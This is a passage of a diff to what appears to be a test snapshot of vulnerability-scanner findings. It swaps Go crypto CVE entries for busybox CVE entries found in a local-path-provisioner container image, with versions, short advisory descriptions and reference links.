}, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42382", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42382", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42382", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://avd.aquasec.com/nvd/cve-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://access.redhat.com/security/cve/CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42383", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42383", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-42383", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://avd.aquasec.com/nvd/cve-2021-42383", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42383", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42384", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42384", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42384", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42385", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42385", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42385", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://avd.aquasec.com/nvd/cve-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20210513164829-c07d793c2f9a", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42386", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/security/cve/CVE-2021-42386", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42386", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://avd.aquasec.com/nvd/cve-2021-42386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://access.redhat.com/security/cve/CVE-2021-42386", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-5179-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20210513164829-c07d793c2f9a", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.31.1-r22", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-28391", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://access.redhat.com/security/cve/CVE-2022-28391", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "https://www.cve.org/CVERecord?id=CVE-2022-28391", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "busybox: remote attackers may execute arbitrary code if netstat is used", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2022-28391", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://access.redhat.com/security/cve/CVE-2022-28391", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42374", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42374", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42374", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://avd.aquasec.com/nvd/cve-2021-42374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://access.redhat.com/security/cve/CVE-2021-42374", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + 